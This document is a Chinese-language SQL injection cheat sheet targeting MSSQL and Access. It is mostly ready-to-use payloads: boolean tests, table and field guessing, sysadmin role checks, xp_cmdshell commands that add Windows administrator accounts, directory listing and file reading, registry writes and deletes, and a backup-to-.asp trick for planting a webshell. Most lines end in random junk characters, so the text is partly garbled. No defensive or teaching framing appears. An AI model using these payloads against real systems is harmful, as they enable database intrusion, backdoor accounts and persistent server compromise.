1.判断是否有注入;and 1=1 ;and 1=2 A l U^,X
2.初步判断是否是mssql ;and user>0 Y %JQ
NQ9v[gv
3.注入参数是字符'and [查询条件] and ''=' kka5=u
;5Sdx5`_
4.搜索时没过滤参数的'and [查询条件] and '%25'=' *G19fJ[5
=S&`~+
5.判断数据库系统 6\4-I^=B
\|;\
;and (select count(*) from sysobjects)>0 mssql /at7H!
tb3VqFx
;and (select count(*) from msysobjects)>0 access y0 * rY
d!,t_jM0
U.7fMc#
O `}EiyV
6.猜数据库 ;and (select Count(*) from [数据库名])>0 O*EV~{K
/A=w`[<
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 6%v9o?:~l
-=ZL(r
1
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 .G0 N+)
Luq4q95]
9.(1)猜字段的ascii值(access) a{5SOe;;
#z `W ,^C
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 ,erw(7}'.
~3&{`9Y
(2)猜字段的ascii值(mssql) *3GV9'-P
(f# (B2j
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 =*mT{q@
~Z\:Nx
10.测试权限结构(mssql) U ZM #O
j|eA*UE
*r7vDc
\(o"/*
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- f-b],YE
,?fJ0n:!%
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- u^80NR
tdy2ZPVtTV
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- mDB
V>Wk\'h
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- \/a6h
{MUB4-@?F$
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- r~4uIUE{
7u):J
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- rO1!h%&o"
3*b5V<}'|
;and 1=(select IS_MEMBER('db_owner'));-- w:~*wv
C-'hXh;hQ
4fEDg{T
}cKB)N
BJb
11.添加mssql和系统的帐户 \o9 \ikR
zw0w."V
;exec master.dbo.sp_addlogin username;-- XX6Z|Y5.
;exec master.dbo.sp_password null,username,password;-- #/)t]&n
C8N)!5(A
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- r"h;JC/&<T
[Kgb#L'{
;exec master.dbo.xp_cmdshell 'net user username password |c_qq Bd
a?cJl
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- !vnQ;g5
vF$i"^;tJ;
;exec master.dbo.xp_cmdshell 'net user username password /add';-- :+rGBkw1m
7s9h:/Lu
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- wj|Zn+{"nF
,"(L2+Yp
]Bw0Qq F#
>DqF>w.1
12.(1)遍历目录 :6^7l/p
?$ r`T]>`2
;create table dirs(paths varchar(100), id int) J=4>zQLW
PNU(;&2<
;insert dirs exec master.dbo.xp_dirtree 'c:\' E-e(K8R
$6hPTc<C
;and (select top 1 paths from dirs)>0 =YO ]m<
-%K!Ra\W
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) jmok]-pC
f8
d
3ZK
*GP2>oEM
jG5HW*>k0
(2)遍历目录 o5<<vvdA
'%)R}wgV
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- *{o7G a
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 0D X_*f
GK(CuwJe
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 U)S=JT~h
6_LeP9s )
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 2Xb,
i
6%D9;-N)
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 )G? qX.D
^)VwxH:s
:|7#D,2
aQkOQy
13.mssql中的存储过程 |@qw
&4#Zi.]
xp_regenumvalues 注册表根键, 子键 [,%=\%5
l6viP}R
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 2hE(h
Ia&R/I
xp_regread 根键,子键,键值名 Uv^\[
2|1fb-AR
;exec xp_regread &hCbXs=
'6KvB
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 <N<Q9}`V
+Y\:Q<eMFg
xp_regwrite 根键,子键, 值名, 值类型, 值 I7f ^2
f)I5=Ijy(
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 _GOSqu!3Y
J
3!~e+wn
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 H'+7z-%G
N^^0j,
xp_regdeletevalue 根键,子键,值名 :5d>^6eoB?
K%^n.
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 BHXi g~d
OWd'z1Yl
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 GkIE;7#2kX
*bkb-nKw
!> UlvT-
{Gxe%gu6K
14.mssql的backup创建webshell /--p#G h'
t6+m` Kq
use model gk ]QR.
\-<BUG]=
create table cmd(str image); c:[k+_Zr
?J[3_!"t
insert into cmd(str) values (''); "fFSZ@,r
{(73*-~$
backup database model to disk='c:\l.asp'; ]B8
A
0.aXg "
]rcF/uQJ<n
;*K4{wvG
15.mssql内置函数 R>'
%}|v/
99m2aT()
;and (select @@version)>0 获得Windows的版本号 ,d
G. 67
``o]i{x
;and user_name()='dbo' 判断当前系统的连接用户是不是sa O*yxOb*
M5xJ_yjG
;and (select user_name())>0 爆当前系统的连接用户 Qm%F]nyy
I[Ra0Q>([k
;and (select db_name())>0 得到当前连接的数据库 `:/'")+@v
&&ioGy}1
Cu"Cpt[
n:j'0WW
16.简洁的webshell %>_[b,
J3$>~?^1
use model tDByOml8Ix
-[>de!
T3$
create table cmd(str image); {C1crp>q
A~ya{^}
insert into cmd(str) values (''); sXKkZ+2q
lU
WXXuO]
backup database model to disk='g:\wwwtest\l.asp';